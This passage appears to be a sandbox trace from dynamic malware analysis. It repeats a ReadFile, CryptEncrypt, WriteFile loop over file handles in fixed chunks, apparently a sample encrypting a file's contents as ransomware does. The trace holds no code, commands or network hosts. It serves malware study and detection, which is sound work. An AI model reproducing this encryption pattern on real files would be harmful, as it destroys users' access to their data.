nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.655] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.656] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.656] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.656] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.656] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.656] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.656] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.657] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.657] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.657] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.657] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.657] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.657] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.658] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.658] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.658] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.658] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.658] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.658] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.658] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.659] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.659] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.659] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.659] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.659] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.659] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.659] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.660] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.660] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.660] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.660] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.660] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.660] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.660] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.661] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.661] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.661] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 